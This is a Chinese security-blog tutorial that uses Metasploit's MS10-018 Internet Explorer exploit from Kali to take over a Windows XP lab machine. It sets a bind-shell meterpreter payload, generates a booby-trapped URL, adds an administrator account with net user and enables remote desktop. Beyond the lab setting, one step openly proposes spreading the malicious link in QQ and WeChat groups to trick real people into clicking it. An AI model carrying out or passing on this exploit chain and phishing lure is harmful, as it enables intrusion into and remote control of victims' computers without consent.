将安全君呀设为"星标⭐️"
第一时间收到文章更新
声明: 安全君呀 公众号文章中的技术只做研究之用,禁止用来从事非法用途,如有使用文章中的技术从事非法活动,一切后果由使用者自负,与本公众号无关。
文章声明:本篇文章内容部分选取网络,如有侵权,请告知删除。
学习传送阵: 老男孩老师微信 oldboylinux
攻击主机:kali
受害靶机:winxp
利用钓鱼木马,通过xp的浏览器漏洞,入侵xp,并控制靶机主机。
通过生成本地木马,把木马种到靶机上,达到让用户无感知的可视化控制靶机主机的目的(不用远 程桌面工具实现控制)
1)打开前面安装的kali服务器,并登录 kali 攻击机,进入终端环境,看能否Ping通xp靶机IP**
如果ping通了,攻击机到靶机xp环境是通的。
2)登录kali,执行msfconsole命令.
msfconsole
3)执行search ms10-018搜索攻击模块(浏览器漏洞攻击),并use 0到指定模块下。
search ms10-018
4)设置攻击者指定的服务器IP(此处设置kali的服务器地址)
###10.0.0.163是攻击者指定的存放木马的服务器,一般是公网服务器,
##不一定是kali,只要是存放木马的公网服务器就可以,这里用kali代替。
msf6 exploit(windows/browser/ms10_018_ie_behaviors) > set srvhost 10.0.0.163 srvhost => 10.0.0.163
##设置一个payload正向连接shell:
(windows/browser/ms10_018_ie_behaviors) > set PAYLOAD windows/meterpreter/bind_tcp
5)执行run生成url地址,这个地址就是要通过社工等方法让目标机进行访问,从而获取对方权限的。
如何钓鱼? 把 http://10.0.0.163:8080/ZP8ghDdFo0Ju地址发到各个QQ群,微信群,诱骗别人点击,如果点击的人的浏览器有漏洞就会中木马。
6)复制自己生成的木马地址,模拟在自己的XP靶机浏览器里打开点击。
7)这时kali的msfconsole中就出自动现了successfully字样信息,此时按回车(如果此时在靶机访问IE 跳出OD,就把靶机里面OD删掉即可)。
8)执行sessions -i 1(i就是in进入的意思,1就是会话的ID)进入这个会话。
9) 验证控制效果
10)在靶机创建用户,提升管理员权限。
##查看默认用户
C:WINDOWSsystem32>net user
##添加oldgirl用户 密码123
C:WINDOWSsystem32> net user admin1 123 /add
##将admin1用户加入到管理员组。
C:WINDOWSsystem32> net localgroup administrators admin1 /add
11) 退出靶机并激活远程桌面。
C:WINDOWSsystem32>exit
exit
##激活靶机远程桌面功能
meterpreter > run post/windows/manage/enable_rdp
12)通过执行mstsc打开远程桌面工具,进行远程连接控制靶机。
Tips
欢迎大家在下面点赞评论加关注,让我们一起在网安之路越走越远!!!
长按扫描下方二维码加关注,了解更多网安知识哦!
原文始发于微信公众号(安全君呀):渗透实战 | 利用浏览器漏洞挂马实现远程控制靶机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论